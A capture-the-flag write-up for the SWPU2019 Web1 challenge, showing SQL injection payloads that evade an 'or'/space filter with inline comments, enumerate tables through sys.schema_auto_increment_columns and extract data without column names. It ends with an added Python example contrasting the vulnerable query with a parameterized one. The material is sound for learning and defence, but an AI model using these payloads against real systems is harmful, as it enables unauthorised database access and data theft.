Key points
Injection without information_schema: https://www.anquanke.com/post/id/193512
Injection without column names: https://nosec.org/home/detail/2245.html
Seeing an "apply to publish an ad" form, the blind guess is XSS.
![No-column-name injection + or bypass ([SWPU2019]Web1) - Figure 1](/uploads/projects/u390550@fftlfh/ab3146ff2b7df2d299696f463f40ad16.png)
The XSS pop-up fires, but clicking the ad details reveals a SQL error.
![No-column-name injection + or bypass ([SWPU2019]Web1) - Figure 2](/uploads/projects/u390550@fftlfh/2eab9a9abf898569a6cd649faf507212.png)
Fuzzing shows that any input containing `or` gets the response "title contains sensitive words":

```sql
1' order by 5#
1'/**/order/**/by/**/5#
1'/**/ororderder/**/bbyy/**/5#
```
Since that does not work, determine the column count with a UNION query instead (the single quote closes the original string literal):

```sql
1'/**/union/**/select/**/1,2,3'%23
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'%23
```
Query the database:

```sql
1'/**/union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'%23
```
![No-column-name injection + or bypass ([SWPU2019]Web1) - Figure 3](/uploads/projects/u390550@fftlfh/38ff46e6a4ba71ce2690258a888be3a2.png)
Query the tables:

```sql
1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'%23
```

This yields the `ads` and `user` tables.
Query the fields

Injection without column names, tried locally first. Since the data has eight columns, the union query uses eight columns:

```sql
1'union/**/select/**/1,(select/**/`4`/**/from/**/(select/**/1,2,3,4,5,6/**/union/**/select/**/*/**/from/**/users)redforce),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
```

The response is "title contains sensitive words", so the backtick is presumably filtered.
Second column:

```sql
-1'union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
```

flag:

```sql
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
```
![No-column-name injection + or bypass ([SWPU2019]Web1) - Figure 4](/uploads/projects/u390550@fftlfh/b4f1dc77a6f3fb05dcb884934b593a00.png)
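As an added example that is not part of the original writeup, here is a Python/sqlite3 model of the ad-detail lookup: it assumes a constructed `ads`/`users` schema (not the challenge's real one) and shows why the inferred `or`/space blocklist both rejects ordinary input and is sidestepped by inline comments, while binding the id as a parameter removes the injection regardless of any filter.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's tables (assumption, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ads(id INTEGER, title TEXT, content TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, flag TEXT);
        INSERT INTO ads VALUES (1, 'bike', 'used bike for sale');
        INSERT INTO users VALUES (1, 'admin', 'flag{constructed}');
    """)
    return conn


def blocklist_rejects(value):
    """The kind of filter the writeup infers: any 'or' substring or any space is rejected."""
    lowered = value.lower()
    return "or" in lowered or " " in lowered


def mysql_view(value):
    """Strip /* */ inline comments and collapse whitespace: what the SQL parser sees after the filter."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", value, flags=re.S)).strip()


def ad_detail_vulnerable(conn, ad_id):
    """String concatenation: the id is parsed as SQL, so a UNION inside it reaches the users table."""
    sql = f"SELECT title, content FROM ads WHERE id = '{ad_id}'"
    return conn.execute(sql).fetchall()


def ad_detail_safe(conn, ad_id):
    """Bound parameter: the id is data, so the same input matches no row instead of being executed."""
    return conn.execute("SELECT title, content FROM ads WHERE id = ?", (ad_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "-1' UNION SELECT username, flag FROM users --"
    print(blocklist_rejects("doors for sale"))                 # True: an ordinary title is blocked
    print(blocklist_rejects("1'/**/union/**/select/**/1,2"))   # False: comments stand in for spaces
    print(mysql_view("1'/**/union/**/select/**/1,2"))          # 1' union select 1,2
    print(ad_detail_vulnerable(db, probe))                     # [('admin', 'flag{constructed}')]
    print(ad_detail_safe(db, probe))                           # []
```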
